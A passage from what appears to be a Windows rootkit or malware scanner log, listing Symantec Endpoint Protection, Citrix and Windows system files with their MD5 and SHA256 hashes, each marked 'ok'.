15:33:59.0888 0x04bc  [ D269BF622EE6053D66563921DD70D363, AE9C1C5A64195AC99B6EBA76CA95614ACAA68207764D89A285229748F8C99878 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\GEDataStore.dll
15:33:59.0888 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\GEDataStore.dll - ok
15:33:59.0890 0x04bc  [ FFA5E905296CD5F7C5C3C1CAD730B090, BD9CE45034A4307646A5F3E6FB5F8576AB476AC8495EAEF6E41CA8E7D5F8A0A0 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AgentCore.dll
15:33:59.0890 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AgentCore.dll - ok
15:33:59.0892 0x04bc  [ 44D10348252E83CF7E860335D678FBF3, D0F802CC6427FF1FCE6EC4967A66D1CC89A0996DA437A5ADFC3FD408112CDAA9 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SmcRes.dll
15:33:59.0893 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SmcRes.dll - ok
15:33:59.0895 0x04bc  [ D3F0616F1DBCF54B15AF0EE111D08258, DC1C552F83B08E9832F2425A331E67088744E98FF447932F5B6AB0667D68934F ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\DataMan.dll
15:33:59.0895 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\DataMan.dll - ok
15:33:59.0897 0x04bc  [ 18F2D656D28363939DEE16ADE2F7F127, E24567A458FBE4551EB906F49AFE4C57E7F16122E68859F49832AAC94EA1DDA9 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\BHClient.dll
15:33:59.0897 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\BHClient.dll - ok
15:33:59.0899 0x04bc  [ 3BC2EB8057EF47C661C88D6890337AD2, 3724864F9DF03E3075C0A16380BB526F23E6A3678B4BE6187DC1801F922DC31C ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\dec_abi.dll
15:33:59.0899 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\dec_abi.dll - ok
15:33:59.0901 0x04bc  [ BE7CCA21185C7A5405DDCAA321048737, C3477F035F2238B739236C247A53E62670DCA5A9A7FEC836008F7D52D12B94A8 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccScanw.dll
15:33:59.0901 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccScanw.dll - ok
15:33:59.0903 0x04bc  [ F890C197ADF21D08DBA4643C9AA54B9F, EF7D64CDB0F513C17BE73415F0D1DA123AC74596EEBE8DEB6C307B86B64C2206 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ecmldr32.DLL
15:33:59.0903 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ecmldr32.DLL - ok
15:33:59.0905 0x04bc  [ A8CDF3768604FF95B54669E20053D569, 2DB85B86C839341F2A879A6D25F787D17EE665D425C1BAC3E1F82BAC61F89F94 ] C:\Windows\SysWOW64\wscapi.dll
15:33:59.0905 0x04bc  C:\Windows\SysWOW64\wscapi.dll - ok
15:33:59.0907 0x04bc  [ 8258362DDB18B644A82D8B5061AD9426, 87CA586B2B1B0089BFF6A259A0743D184AE383B3B12C4BC5986D72ADFFBE9EDA ] C:\Windows\SysWOW64\wscisvif.dll
15:33:59.0907 0x04bc  C:\Windows\SysWOW64\wscisvif.dll - ok
15:33:59.0909 0x04bc  [ F8C11AC77752F6D4950DE5F71D3DEA8C, A3DDB8F22A1627CC32C7BB77C0F46288F28C9FA970EE8CD62EFD4DE3562EA894 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AtpiEim.dll
15:33:59.0909 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AtpiEim.dll - ok
15:33:59.0912 0x04bc  [ 49ACA548B2423F1C67898E6AC719A9A6, 23D84137EAB9AFDD31CBB6776B6B25AD135A120AF7F7885EB5BBF9E0A2CCC4C1 ] C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
15:33:59.0912 0x04bc  C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll - ok
15:33:59.0914 0x04bc  [ 7DF186D86CF8C571A12AAB788C777F84, A2C1064BFDEF2A85CB12A11E55728BCC09933C115C278403F07B27DB2C36C710 ] C:\Windows\SysWOW64\wscproxystub.dll
15:33:59.0914 0x04bc  C:\Windows\SysWOW64\wscproxystub.dll - ok
15:33:59.0916 0x04bc  [ 9BC93C9ACFA34DB5A41B89357B31E4ED, C3B9DDCB31970F91F8CAF85D2431903DB1738872775EEFD6712B7646BDE1250C ] C:\Windows\System32\FwRemoteSvr.dll
15:33:59.0916 0x04bc  C:\Windows\System32\FwRemoteSvr.dll - ok
15:33:59.0917 0x04bc  [ 9719E3D834F5C8C43F56A93DFA497023, 4D78D4BD4835C0A237821967156C19DF4B90384A6BCB1F48CEAF35D003A0099A ] C:\Windows\System32\pnpts.dll
15:33:59.0917 0x04bc  C:\Windows\System32\pnpts.dll - ok
15:33:59.0919 0x04bc  [ F73D6140303C3B33517221F8CD5F1F51, D9921787B93945AE6F6D261190D7DDFF10737D8703ED8BD969E51EF3F2304740 ] C:\Windows\System32\snacnp.dll
15:33:59.0919 0x04bc  C:\Windows\System32\snacnp.dll - ok
15:33:59.0921 0x04bc  [ E811F8510B133E70CF6E509FB809824F, 82541F2B15748250462B67B6C77530D4F7C45A1482237EC49B28F9FA5A414108 ] C:\Windows\System32\wdiasqmmodule.dll
15:33:59.0921 0x04bc  C:\Windows\System32\wdiasqmmodule.dll - ok
15:33:59.0923 0x04bc  [ 01D6F94837FF920C3CC1CC7B32105D03, 1CC500E3C5685AB0EB93B1A6B685EB72B48451B073465116628ACED29C4DFAAC ] C:\Program Files (x86)\Citrix\ICA Client\x64\pnsson.dll
15:33:59.0923 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\x64\pnsson.dll - ok
15:33:59.0925 0x04bc  [ 06A754FE28A06F780A099703CFCAAA22, FCADF16C88EEC651258149616202CC29D649FE8CBBBA481BEA9A67C2ED82844B ] C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
15:33:59.0925 0x04bc  C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll - ok
15:33:59.0927 0x04bc  [ 7CBB1D4D13DC62D7F529D87151FD3CD3, DA75C5E64777F6ACE6F77A72D3362A40F8BE59DF3E6BC83550A81D9E20730401 ] C:\Program Files\Windows Defender\MpSvc.dll
15:33:59.0927 0x04bc  C:\Program Files\Windows Defender\MpSvc.dll - ok
15:33:59.0929 0x04bc  [ ECCB8C65A8A8DA51139E5645EE613B6A, DF6905EE78B5A585967533D9892205E6C51F287DE3F80C520A5044E2E3E0BD8E ] C:\Program Files (x86)\Citrix\ICA Client\x64\ssoncom.exe
15:33:59.0929 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\x64\ssoncom.exe - ok
15:33:59.0931 0x04bc  [ 525DB7C8E64F8026BBFCEA2BF61652BF, A0557E090E33ABAAF5E5F3AFC4FBD4DCEC75A96311949069B32C626F5BBC66B5 ] C:\Program Files (x86)\Citrix\ICA Client\x64\ssonstub.dll
15:33:59.0931 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\x64\ssonstub.dll - ok
15:33:59.0933 0x04bc  [ 33B6A6B31E0DFC4A20CEB9EAE31F3272, 6CF7AF7F1B6C6029D7CD29D4A3D3DD14A19E42B1467880D8D083D97077BA2521 ] C:\Program Files (x86)\Citrix\ICA Client\ssonsvr.exe
15:33:59.0933 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\ssonsvr.exe - ok
15:33:59.0934 0x04bc  [ CC1B2777B5FD8B45CC76D86594467CD5, E37BA623C73DF83CD478366EF140E9D6C0B18B57DA3F782299D71B53BDA89A39 ] C:\Program Files\Altiris\Dagent\libcrypto.dll
15:33:59.0934 0x04bc  C:\Program Files\Altiris\Dagent\libcrypto.dll - ok
15:33:59.0936 0x04bc  [ C9564CF4976E7E96B4052737AA2492B4, C3AC989C8489A23BB96400B1856F5325FFC67E844F04651EA5D61BC20A991C6D ] C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\msvcr80.dll
15:33:59.0936 0x04bc  C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\msvcr80.dll - ok
15:33:59.0938 0x04bc  [ 662BA98309818AF2C17D4E48BF4021C4, 57B3FFAECE3DF5E22B6764A95D2B8523AA02CCCB4BD0779025C11D02EEBF4B1E ] C:\Program Files\Windows Defender\MpClient.dll
15:33:59.0938 0x04bc  C:\Program Files\Windows Defender\MpClient.dll - ok
15:33:59.0940 0x04bc  [ AFA79C343F9D1555F7E5D5FA70BB2A14, 440EF3ADC1F5C7A5ED3E872C8D8DFA61B039454C3CA67F8A51CA8BDCFDC4BA4A ] C:\Windows\System32\PortableDeviceConnectApi.dll
15:33:59.0940 0x04bc  C:\Windows\System32\PortableDeviceConnectApi.dll - ok
15:33:59.0942 0x04bc  [ E1B22739C933BE33F53DB58C5393ADD3, 26EE0DD091D2E00DECC774DC1EEDFFDE69AF74B0C769CCBE091AFC32C66E4207 ] C:\Windows\System32\Apphlpdm.dll
15:33:59.0942 0x04bc  C:\Windows\System32\Apphlpdm.dll - ok
15:33:59.0944 0x04bc  [ 5B236296E233CAA6BF86BE0C6501A224, 1261A3DABED023A66F6B79C3862222888565934C0427BAF5296CC2ACAAE2D7A3 ] C:\Windows\System32\rdpcorekmts.dll
15:33:59.0944 0x04bc  C:\Windows\System32\rdpcorekmts.dll - ok
15:33:59.0946 0x04bc  [ 6D5DCC1579B3961D791ABDE286A1CB5E, 36411BEC516D5CBBEB5A266CC959FD39738C2B085405E068769E8623F081F4F8 ] C:\Windows\System32\rdpwsx.dll
15:33:59.0946 0x04bc  C:\Windows\System32\rdpwsx.dll - ok
15:33:59.0948 0x04bc  [ ECA6AC33BD9E441F7B47D173D715D268, 5B9017F80BD8C7823CFE1AB4C21D91388E1B31BF0D77058A98791D2FACA11EB6 ] C:\Windows\System32\msxml3.dll
15:33:59.0948 0x04bc  C:\Windows\System32\msxml3.dll - ok
15:33:59.0949 0x04bc  [ 1B4A711265FEA91259553D7B4E83394B, F09C4DF2344FCBA799C56104BE1A79B1DD641835F295855021FC6D69DB697273 ] C:\Windows\System32\tlscsp.dll
15:33:59.0949 0x04bc  C:\Windows\System32\tlscsp.dll - ok
15:33:59.0951 0x04bc  [ 1B6163C503398B23FF8B939C67747683, 339A5AA7970FF34FAAB213B655860C5B0DEC5F983A4A11A088017D849F320ACE ] C:\Windows\System32\drivers\rdpdr.sys
15:33:59.0951 0x04bc  C:\Windows\System32\drivers\rdpdr.sys - ok
15:33:59.0953 0x04bc  [ E61608AA35E98999AF9AAEEEA6114B0A, F754CDE89DC96786D2A3C4D19EE2AEF1008E634E4DE3C0CBF927436DE90C04A6 ] C:\Windows\System32\drivers\rdpwd.sys
15:33:59.0953 0x04bc  C:\Windows\System32\drivers\rdpwd.sys - ok
15:33:59.0955 0x04bc  [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] C:\Windows\System32\drivers\tdtcp.sys
15:33:59.0955 0x04bc  C:\Windows\System32\drivers\tdtcp.sys - ok
15:33:59.0956 0x04bc  [ 4CE278FC9671BA81A138D70823FCAA09, CBE501436696E32A3701B9F377B823AC36647B6626595F76CC63E2396AD7D300 ] C:\Windows\System32\drivers\tssecsrv.sys
15:33:59.0956 0x04bc  C:\Windows\System32\drivers\tssecsrv.sys - ok
15:33:59.0957 0x04bc  [ F8F5016A8021390DFAF8782687B4F226, BF51874E3448F2800DCC74BDDCFD86D55C95B4B076DFAE61DD821A440BB0405E ] C:\Windows\System32\SessEnv.dll
15:33:59.0958 0x04bc  C:\Windows\System32\SessEnv.dll - ok
15:33:59.0959 0x04bc  [ BEBC13D55C302339B9350D9FF9EEFCB5, E8513D2D23D7F134BB4E3BFC85F87B802F4F2E411CCF33306023E5F8D54C5CFF ] C:\Windows\System32\umrdp.dll
15:33:59.0959 0x04bc  C:\Windows\System32\umrdp.dll - ok
15:33:59.0961 0x04bc  [ BF95EA5809E3BBF55370F7CB309FEBD0, 62ADBA6E1A7DDDEFA971580161F30896DFFC27EB4EB82E3CC72062D57DA66500 ] C:\Windows\System32\conhost.exe
15:33:59.0961 0x04bc  C:\Windows\System32\conhost.exe - ok
15:33:59.0963 0x04bc  [ 3B6928BC39E5530CEAD1E99269E7B1EE, 0F084CCC40CBF7C3C7472DDAD609B5FD31AACAFA44E23F9EC7E9E2184713B986 ] C:\Windows\System32\net1.exe
15:33:59.0963 0x04bc  C:\Windows\System32\net1.exe - ok
15:33:59.0965 0x04bc  [ B585EEBBA9014916D069609129947340, A5D541007CCE5E59195B27D68AAF37B3F156409654ACA48564D2DA78EEA6A846 ] C:\Windows\System32\neth.dll
15:33:59.0965 0x04bc  C:\Windows\System32\neth.dll - ok
15:33:59.0967 0x04bc  [ 0015ACFBBDD164A8A730009908868CA7, E1FF243AD2CF959FAB81EFE701592414991C03416FF296ADC93906E76B707C4D ] C:\Windows\System32\winspool.drv
15:33:59.0967 0x04bc  C:\Windows\System32\winspool.drv - ok
15:33:59.0969 0x04bc  [ 9FCA3A84338ADEF2AFF67CDA46EF8539, 087DF72096852AE98C56990EE6E68835BE95E7E49ECDDE8B54DAC11C9E07FE94 ] C:\Windows\System32\umb.dll
15:33:59.0969 0x04bc  C:\Windows\System32\umb.dll - ok
15:33:59.0971 0x04bc  [ 59EBD493812F8497800707496DB4F9AA, 2AC42D90BF916318A6CD6129A043486D38DF8234E887C5D7AE1AA3A4121D1047 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LueEim.dll
15:33:59.0971 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LueEim.dll - ok
15:33:59.0972 0x04bc  [ 7D8E2907D176EDD087831AEA0E9D7455, E09FDA71A4199A164969497CF59C28CBCA239B05DBB3B97CF38EEDD14C86078B ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SymDeltaDll.dll
15:33:59.0972 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SymDeltaDll.dll - ok
15:33:59.0974 0x04bc  [ 639774C9ACD063F028F6084ABF5593AD, 9DFD80610CBBC9188F6C6BC85C87016B0AE42254FC289C2B578E85282BDD9C23 ] C:\Windows\System32\taskhost.exe
15:33:59.0974 0x04bc  C:\Windows\System32\taskhost.exe - ok
15:33:59.0976 0x04bc  [ A1D33876FFFDA2495A5FB5D082506341, DB25C93C191DD17D2143404C4751F1FCEDA10DBE8CEC2DC5804BD5022F5161E7 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AtpiEimProxy.dll
15:33:59.0976 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AtpiEimProxy.dll - ok
15:33:59.0978 0x04bc  [ E629F1A051C82795DDFFD3E8D4855811, 6E4DFFEAB2795C98EA6DCAF10EA6D97413D0F8CA0C04869CB20B74FF4D6FE679 ] C:\Windows\System32\dimsjob.dll
15:33:59.0978 0x04bc  C:\Windows\System32\dimsjob.dll - ok
15:33:59.0980 0x04bc  [ 35CB97CBC3EDC463418ED4997AAB29B6, EE60EABE2D87CEDD68FB8985B6C5D70930015FB2B8DB9FDCB4044587BC6ECA4C ] C:\Windows\System32\pautoenr.dll
15:33:59.0980 0x04bc  C:\Windows\System32\pautoenr.dll - ok
15:33:59.0982 0x04bc  [ 2DE2A25E3040CB40391643AF3DE17083, C5322D91B0D709CAEE854BD2817C0A87B3C6D7937237A89F3A81739F82A35C84 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF23.dll
15:33:59.0982 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF23.dll - ok
15:33:59.0984 0x04bc  [ ABF3BB3AF58AE95C85BDA834C7CF18DA, 5B6E5E0C67E4C5D4DF998E754AA86E88BBE6883BF1312BC0D6C88F7EADECBCBB ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\RepMgtTim.dll
15:33:59.0984 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\RepMgtTim.dll - ok
15:33:59.0986 0x04bc  [ F66D54CFE57D8FA33B32DA05D6385B4C, 4F1FCDF80376183BDD63E5F23D84E8734E21095A9B3CFAC7F7F3035F4738AB15 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\BashEim.dll
15:33:59.0986 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\BashEim.dll - ok
15:33:59.0989 0x04bc  [ E9C771FB12C7178EF26CD45C9406BFEA, 033E01ECCC1DA31CD7D64AEDDE20CDBFBAFBBC0A21AED37ABF4CD97C8CA6A523 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\CIdsEim.dll
15:33:59.0989 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\CIdsEim.dll - ok
15:33:59.0991 0x04bc  [ 4DAD50896E9663FD3CB58EAE5723816D, BAF652A1D1113B64F44D306761AF829617AC8ED09A79BA70C32E2CB95CF4956A ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LueEimProxy.dll
15:33:59.0991 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LueEimProxy.dll - ok
15:33:59.0993 0x04bc  [ 1E508CE4B0890ADDA86222B8A54B58EC, CFC3B8327A2149F0B027EB46BE43E69779143A242FAD0A6793F3C1BBE6EB57F9 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF22.dll
15:33:59.0993 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF22.dll - ok
15:33:59.0995 0x04bc  [ 1E508CE4B0890ADDA86222B8A54B58EC, CFC3B8327A2149F0B027EB46BE43E69779143A242FAD0A6793F3C1BBE6EB57F9 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF22.dll
15:33:59.0995 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF22.dll - ok
15:33:59.0998 0x04bc  [ 150056CF60779850649B8D0A3DFEF2FA, 5CC28DAF4F3354624E5E3A264E0575917CCA85FB1358C97652405FB3464E0FBA ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF16.dll
15:33:59.0998 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF16.dll - ok
15:34:00.0000 0x04bc  [ 94F6D769D4E6559944F204445BF1358C, 26DCD599ED67043B9EAC94BD9852BC7262E9AB9213302E836BCA0F9378830E93 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\IMail.dll
15:34:00.0000 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\IMail.dll - ok
15:34:00.0002 0x04bc  [ D2CCA7A8DB7639AA8D319D3619808C69, FDD730CA9F85C33774CB3580F5899C64BFAD9DEF89B813EA2BB0B1A27C43E885 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\IMailRes.dll
15:34:00.0002 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\IMailRes.dll - ok
15:34:00.0004 0x04bc  [ DF2E86CFE9AB8A9E4F3BB25177FCD906, 94B7A35819C3B794BEFFBAB74364CAD46E4979E0FB6F4480EB978504D978CDC4 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\notesext.dll
15:34:00.0004 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\notesext.dll - ok
15:34:00.0006 0x04bc  [ 039A2391E1FE18F3AC7B85E2A25217FF, 60C939671479BBEFAAA3A5E17BD5E9F8B574516DC75CBA78E9DC52ACA71A6AEC ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\notesextRes.dll
15:34:00.0006 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\notesextRes.dll - ok
15:34:00.0008 0x04bc  [ 46863C4CC5B68EB09EA2D5EEF0F1193A, 9B5593E1F484AC8F96F89A5995FB1FE9C51CB2F0F545607F6850751191150CFE ] C:\Windows\System32\radardt.dll
15:34:00.0008 0x04bc  C:\Windows\System32\radardt.dll - ok
15:34:00.0010 0x04bc  [ 150056CF60779850649B8D0A3DFEF2FA, 5CC28DAF4F3354624E5E3A264E0575917CCA85FB1358C97652405FB3464E0FBA ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF16.dll
15:34:00.0010 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF16.dll - ok
15:34:00.0012 0x04bc  [ 507A52A2FB119163DD11027F78D49619, 808E06D7BEDB4C8A82DB00B3E999BBA337243B620CBC1BC4EDB470A6C491C771 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccIPC.dll
15:34:00.0013 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccIPC.dll - ok
15:34:00.0015 0x04bc  [ 7FC6F5B052254DB9D77FCED067AF8587, FA20AFBEB9EC6C8A6EA94611B50DE7D59AFF46DA88637BC05AE1C5CAA354A706 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyLink.dll
15:34:00.0015 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyLink.dll - ok
15:34:00.0017 0x04bc  [ 67F061D8566A7E68EF7944B2A6928282, F3C4B1BAB8596BC0164778A5EA8A52AE96FF88FA85FA1A74110DB05B4A789CD4 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\vpmsece.dll
15:34:00.0017 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\vpmsece.dll - ok
15:34:00.0019 0x04bc  [ EE231D01290ECF30BF5AB8D13E6B0563, D04E4F075DEE9A4FAB0C5F6AD742582C3DE678533FBE05A7868A2D4107157DED ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SavEmail.dll
15:34:00.0019 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SavEmail.dll - ok
15:34:00.0021 0x04bc  [ 64CA7ECFDCDB86A31F4B1812B22025B9, 7D6A8EC11C178ACC0203CCEF1209D91B64B35BBB374038A86B5E29A56B70FF53 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF3.dll
15:34:00.0021 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IPSFF3.dll - ok
15:34:00.0023 0x04bc  [ 64CA7ECFDCDB86A31F4B1812B22025B9, 7D6A8EC11C178ACC0203CCEF1209D91B64B35BBB374038A86B5E29A56B70FF53 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF3.dll
15:34:00.0023 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF\components\IPSFF3.dll - ok
15:34:00.0025 0x04bc  [ 933A26DB39DEFEA75606037906F7BA6F, 8C7B422247C6D567B2B2D172113546D3F6B59AD5F7699E736289FA9FF6CB538C ] C:\Windows\System32\localspl.dll
15:34:00.0025 0x04bc  C:\Windows\System32\localspl.dll - ok
15:34:00.0027 0x04bc  [ 3285481F5C12305CA104A6C493CA5A0B, ADB39B15D26A954B0F347C7BAFCC76DE5E3CF3CF05736E8987E0832AA7F8563C ] C:\Windows\System32\spoolss.dll
15:34:00.0027 0x04bc  C:\Windows\System32\spoolss.dll - ok
15:34:00.0029 0x04bc  [ C25CA25A1D440ED3F88AA558017AD4C5, 9087C0B710CF0575A2FF4BB8BF314CD0DA4F02D52DADF74008BD950A77206C72 ] C:\Windows\System32\AdobePDF.dll
15:34:00.0029 0x04bc  C:\Windows\System32\AdobePDF.dll - ok
15:34:00.0031 0x04bc  [ C5AC93CF3BA30D367FB49148A2B673B9, 07B556039BBA841BC9F28979C3AD5D238B55391F921C9C805F3AFC9EFB437766 ] C:\Windows\System32\PrintIsolationProxy.dll
15:34:00.0031 0x04bc  C:\Windows\System32\PrintIsolationProxy.dll - ok
15:34:00.0033 0x04bc  [ 19E41CCCEE697CC9465396B370929792, A9FC4C33C71C3677FE57779380E55FDE2AC0B0C70A9DBCBA0D0B6FA92C709A7F ] C:\Windows\System32\FXSMON.dll
15:34:00.0033 0x04bc  C:\Windows\System32\FXSMON.dll - ok
15:34:00.0034 0x04bc  [ 93518C6EDE0B61BCBD02BDB02BD05FEE, 3637F5E5F15093AFB501EE910368CF900B422AC22669391FFA4198BBAE6F8FCB ] C:\Windows\System32\snmpapi.dll
15:34:00.0035 0x04bc  C:\Windows\System32\snmpapi.dll - ok
15:34:00.0036 0x04bc  [ 32A3C8600AF124CBAAD845F13CFAE3CB, F36FE9E57D5C509FEECE890F9F8717F9CC6F762E32AE0B7DB7E0153370CE0B9D ] C:\Windows\System32\tcpmon.dll
15:34:00.0036 0x04bc  C:\Windows\System32\tcpmon.dll - ok
15:34:00.0038 0x04bc  [ FFF9D00CF16397C64317F213484F94BD, 94D0584E14BDB27F61F59A7BCEA529A1594261BE0CE74502C13E8865843BA414 ] C:\Windows\System32\wsnmp32.dll
15:34:00.0038 0x04bc  C:\Windows\System32\wsnmp32.dll - ok
15:34:00.0040 0x04bc  [ DF72A9936D0C3F517083119648814B09, 6BA4DCAC2F55A393A266ED0B2AF92B38141654D1666E3E143D85BBAF21663E1E ] C:\Windows\System32\usbmon.dll
15:34:00.0040 0x04bc  C:\Windows\System32\usbmon.dll - ok
15:34:00.0042 0x04bc  [ A1D7E3ADCDB07DDB6F423862DCB1A52B, 6191C33D2AE090F6F055D6AE211096CE8F003EC5518A5333EE1E376052176BAB ] C:\Windows\System32\WSDMon.dll
15:34:00.0042 0x04bc  C:\Windows\System32\WSDMon.dll - ok
15:34:00.0044 0x04bc  [ 4581716B4BF76ACFD8E167EB0B26D82A, 39D822527114EEED68044CCE4D542767F53978D9E0A7F72638F1CA9A016DE13B ] C:\Windows\System32\fdPnp.dll
15:34:00.0044 0x04bc  C:\Windows\System32\fdPnp.dll - ok
15:34:00.0046 0x04bc  [ 04E0F21C3C472AD8FA848BD4A3E64F13, 5EB9661B3457B2824AB4E370FC6644B8F6EB831FBA0B2591CF0CE3E40FB4F2E3 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\hwiddll.dll
15:34:00.0046 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\hwiddll.dll - ok
15:34:00.0048 0x04bc  [ 8EAFA73D47F176CB1931CFE35290CAEF, AFA676AED6B6F3E51F14ADCB2E58E69479CF6303161D83C13AD2AF6FC8ADE78C ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Netport.dll
15:34:00.0048 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Netport.dll - ok
15:34:00.0050 0x04bc  [ 94DFBB481BF51158B216E23C5C1C9D6E, 0199086A70B9B63E48A7A15C8AE5442E9C6BC0173BD80A104DE1BE6A6C25F202 ] C:\Windows\System32\certcli.dll
